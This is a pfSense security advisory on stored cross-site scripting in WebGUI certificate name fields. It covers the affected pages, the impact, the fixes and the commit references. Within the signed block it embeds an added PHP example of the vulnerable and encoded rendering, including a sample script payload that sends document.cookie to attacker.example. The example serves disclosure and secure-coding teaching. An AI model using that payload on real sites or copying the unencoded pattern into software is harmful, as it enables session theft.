-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
pfSense-SA-15_07.webgui                                   Security Advisory
                                                                    pfSense

Topic:          Multiple Stored XSS Vulnerabilities in the pfSense WebGUI

Category:       pfSense Base System
Module:         webgui
Announced:      2015-07-01
Credits:        Hari Hara Subramani, Internal
Affects:        pfSense <= 2.2.3
Corrected:      2015-07-01 15:36:22 UTC (pfsense/master)
                2015-07-01 15:32:50 UTC (pfsense/RELENG_2_2, pfSense 2.2.4)

0.   Revision History

v1.0  2015-07-01  Initial release

I.   Background

The pfSense® system is a free network firewall distribution based on the
FreeBSD operating system. The pfSense system includes third-party free
software packages for additional functionality, and provides most of the
functionality of common commercial firewalls.

The majority of users of pfSense software have never installed or used a
stock FreeBSD system. Unlike similar GNU/Linux-based firewall
distributions, there is no need for any UNIX knowledge. The command line
is never used, and there is no need to ever manually edit any rule sets.
Instead, pfSense software includes a web interface for the configuration
of all included components. Users familiar with commercial firewalls will
quickly understand the web interface, while those unfamiliar with
commercial-grade firewalls may encounter a short learning curve.

II.  Problem Description

Multiple Stored Cross-Site Scripting (XSS) vulnerabilities were found in
the pfSense WebGUI. The "Descriptive Name" field of Certificate
Authorities, Certificates, and Certificate Revocation Lists was not being
sanitized or encoded properly in certain cases. As a result, stored XSS
was possible when values entered in these fields were displayed to the
user. Because the value is saved in the configuration, the payload runs in
the browser of any user who later views a page that renders the name, not
only the user who entered it.
List of affected pages:

usr/local/www/system_certmanager.php      (Discovered by Hari Hara Subramani)
usr/local/www/vpn_openvpn_server.php      (Discovered by Hari Hara Subramani)
usr/local/www/system_camanager.php        (Discovered Internally)
usr/local/www/system_crlmanager.php       (Discovered Internally)
usr/local/www/vpn_openvpn_client.php      (Discovered Internally)
usr/local/www/vpn_ipsec_phase1.php        (Discovered Internally)
usr/local/www/system_authservers.php      (Discovered Internally)
usr/local/www/system_usermanager.php      (Discovered Internally)
usr/local/www/system_advanced_admin.php   (Discovered Internally)
usr/local/www/services_captiveportal.php  (Discovered Internally)
usr/local/www/wizards/openvpn_wizard.inc  (Discovered Internally)

III. Impact

Due to the lack of proper encoding on the affected variables and pages,
arbitrary JavaScript can be executed in the browser of any user who views
the affected pages. The user's session cookie or other information from
the session may be compromised, and any action that user is permitted to
take in the WebGUI can be performed on their behalf.

IV.  Workaround

Upgrade to pfSense 2.2.4 or later which includes fixes for these issues.

To mitigate the problem on older releases, use one or more of the
following:

* Limit access to the affected pages to trusted administrators only.

V.   Solution

Upgrade to pfSense 2.2.4. This may be performed in the web interface or
from the console.

See https://doc.pfsense.org/index.php/Upgrade_Guide

VI.  Correction details

The following list contains the correction revision numbers for each
affected item.
Branch/path                                                      Revision
- - -------------------------------------------------------------------------
pfSense/master             b75cdd94a7f6f571238dd313d5f499f05f819221
                           b741d2ef0047acf7b18b5748f1ec651eb7679909
                           234cde4b5dcdeb332d5376b9c2c6f5a79fba9c24
                           28bb81784f0ba3e147b1d78224b0a43d6675e714
                           8bcc385b3a5325a04a1afd72f439a40c7faff098
                           d6a94eda00a3df51f59ed893e6c0a7669d4ce563
                           a14571438d498c5b084cc5c94886f75cbdf58bfd
                           11df03205923c758039b697f89ec67cf4198f109
                           0d458903176fc2ba26969dfd4001402274dde62f
                           e67c70a3b3035a73d3334b86afb4aac4433ccd4a
                           636dfa95287b088d17a53bf2e82de63ed54a625e
pfSense/RELENG_2_2         362ddda19060ca54c18b43c3b758b00dd253937d
                           97fdd83dcb36383151bb40021ef66d907bc820c0
                           f08e24a389543908e4934e13af87221a803b0559
                           009bd5fea3306e7e3a2365130e5e8672dc312b67
                           f7ca96741d67a0719da213d410cf17e4437619f4
                           f9e80e5d657f6d67bb63411809564cb7f95eb8ff
                           2ce606e15a6affac120b185ae5430b959f4cae5f
                           76e3f194eb6d56728e4f031b61759990f6fd4538
                           d2d45b5fd47bfdb8a73cb44e32ea001e5d04aded
                           0d6b017b2808d42668e09757fab38bc7832ef0da
                           ae142a104910ac810102abb69e24adf7b8811784
- - -------------------------------------------------------------------------

VII. References

None.
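The following is an added illustration of the bug class described in section II, not code from pfSense or from the commits listed above. It shows the vulnerable pattern (a stored "Descriptive Name" echoed straight into markup) next to the encoded form. The $config array layout, the refid value and the payload string are constructed for the example.

```php
<?php
// Added example (not pfSense code): a stored CA "Descriptive Name" reaching
// the page unencoded, and the output encoding that closes the hole.
// The $config layout below is assumed for illustration only.

// Constructed sample: one CA entry whose descr carries a script payload.
$config = [
    'ca' => [
        [
            'refid' => 'example-refid-1',
            'descr' => 'Internal CA<script>document.location='
                     . '"https://attacker.example/?c="+document.cookie</script>',
        ],
    ],
];

// Vulnerable pattern: the stored value is interpolated verbatim, so the
// <script> element in descr becomes live markup for whoever views the page.
function render_ca_options_vulnerable(array $cas): string
{
    $html = "<select name=\"caref\">\n";
    foreach ($cas as $ca) {
        $html .= '  <option value="' . $ca['refid'] . '">'
               . $ca['descr'] . "</option>\n";
    }
    return $html . "</select>\n";
}

// Encoding helper: ENT_QUOTES encodes both quote styles, so the same helper
// is safe for text nodes and for single- or double-quoted attribute values.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML401, 'UTF-8');
}

// Fixed pattern: every value that came from the configuration is encoded at
// the point where it is written into the page.
function render_ca_options_fixed(array $cas): string
{
    $html = "<select name=\"caref\">\n";
    foreach ($cas as $ca) {
        $html .= '  <option value="' . h($ca['refid']) . '">'
               . h($ca['descr']) . "</option>\n";
    }
    return $html . "</select>\n";
}

echo "--- vulnerable ---\n" . render_ca_options_vulnerable($config['ca']);
echo "--- fixed ---\n"      . render_ca_options_fixed($config['ca']);

// Self-check: the encoded output must not contain a raw "<script" sequence,
// while the vulnerable output does.
assert(strpos(render_ca_options_vulnerable($config['ca']), '<script') !== false);
assert(strpos(render_ca_options_fixed($config['ca']), '<script') === false);
```

Encoding at output time, rather than filtering at input time, is the durable fix here: a descriptive name can also enter the configuration through a restored config.xml or an older release, so every page that renders the field has to encode it regardless of how it was stored. That is also why the affected-page list in section II is longer than the three certificate pages where the field is edited.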
The latest revision of this advisory is available at

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEE40XvjEU56XSUPIMdE7mH/ZIU+NoFAmElU9sACgkQE7mH/ZIU
+Nonfw/+OG9VgVj2Iaktx+6eztit/Klh/VnisKZdN9I/eD5+UArA15aD0vAi0GK3
yrn7lreH4UcbNxuw3mQUZCYq9nIjBnD4DvD4UBrVx6LAYjnLj4tGuP/YBGzQSAeH
MsKIGUc9WgL12BE+fsZsMu4UDQ+JVCTPQ06pvdqrhHooh+IcOuo/+Qhpf+W9NdTT
Kr99jlJgLNoMGIcOrbYx/fzDm77OCyue0bYvYCh1PGxDWCs/qyWHpO342gguIEyx
56m4qOCfEgzc9SGwsRDVvUiaueOYJQerFYnFJmP+V8t3wMoL8QYU4TGT9CO+qyNP
FwWiv3ztsnIO+mCaIliUQe/7CXZjs3ghr27Gh2QZxtTpf2tvyDDUmmRgNfNH8D7a
HbdxvJdghXy/l34Ov9Gjf5Q+flMxsRVqsXWdLhZOkO2LUzvLzg1kctj+BKZC4Xbk
s8h6KOMqdcJwoyLfShmS9U7l5qWkYBPe4plTw6dFdvCQdiTjhatoQJ02BTNuxLi8
ls3Jnntdbd4DJmkSJ3x0D4oHli7lQaWiAo5T5kyMTiEFMjp/zVIQ3fqVNM+Nbfzb
rvSKOzHu6G+4Q5TUnmR+GgJT7wpqCCzPxGZC4c/ABU6A3Ew3LOU036gTSJUI3WAZ
jtglV+Co5p2kHVRnh7AqM967X0Q5hvo1cV6yXwRCwhskF2EoQdA=
=vfVt
-----END PGP SIGNATURE-----